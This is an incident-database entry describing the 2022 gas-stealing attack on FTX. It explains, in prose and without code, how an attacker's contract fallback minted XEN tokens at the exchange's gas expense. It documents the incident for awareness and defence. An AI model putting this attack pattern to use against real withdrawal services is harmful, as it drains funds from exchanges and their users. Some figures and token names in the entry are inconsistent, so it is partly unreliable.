link.png

ID:

ftx-1213

Date:

Status:

Incident Count:

October 13, 2022

Verified

4

info.png
target.png
REKT

Contributor:

chain.png

web3rekt.com

KYC By:

KYC:

None

info.png

Audit By:

Audits:

None

Loss Amount:

100,845

info.png

Recovered:

-

Rewards:

Ticker:

USD, ETH

info.png

Key Indicators

Platform:

Type:

Category:

Method:

Data Sources:

Ethereum

Exchange

Assets

Contract Vulnerabilities

Extended Method:

Lack of restriction on the recipient address being the contract address, nor a limit on the transfer GAS Limit for ETH Tokens

info.png

Days in Operation:

1350

(3.70 Years)

chain.png
chain.png
chain.png
chain.png
datasource.png

Beosin reported that FTX was under a gas stealing attack by minting ZEN token.

The attacker deploys the arbitrage contract and then initiates an ETH withdrawal operation from FTX to the arbitrage contract. In the fallback function of the arbitrage contract, the claim/mint function of the XEN project is called to obtain XEN. As the sender of the withdrawal transaction is the FTX exchange, the FTX exchange will pay gas for the whole process. FTX does not restrict the recipient to be the contract address, nor does it impose a limit on the ETH gas limit. FTX hot wallet address will transfer a small amount of money to the attack contract, and subcontracts are created in batches. The subcontracts will self-destruct each time after execution. Then subcontract's fallback() function will initiate mint request to Xen contract.

As of now, the FTX exchange has lost a total of 81+ ETH due to the GAS theft vulnerability, and the hacker address has acquired over 100 million XEN Token and exchanged some of the XEN tokens for 61 ETH through decentralized exchanges such as DoDo, Uniswap, etc. and deposited them to the FTX as well as Binance exchanges.

info.png

DISCLAIMER: While web3rekt has used the best efforts in aggregating and maintaining this database, this web site makes no representations or warranties with respect to the accuracy or completeness of its information and data herein, and specifically disclaim any implied warranties of merchantability or fitness for any particular purpose. 

Under no circumstances, shall web3rekt be liable for any loss of profit or funds, any regulatory or governmental penalties, any legal costs, or any other commercial and non-commercial damages, including but not limited to special, incidental, consequential, or other damages from any or all usage of the data and information derived from this database.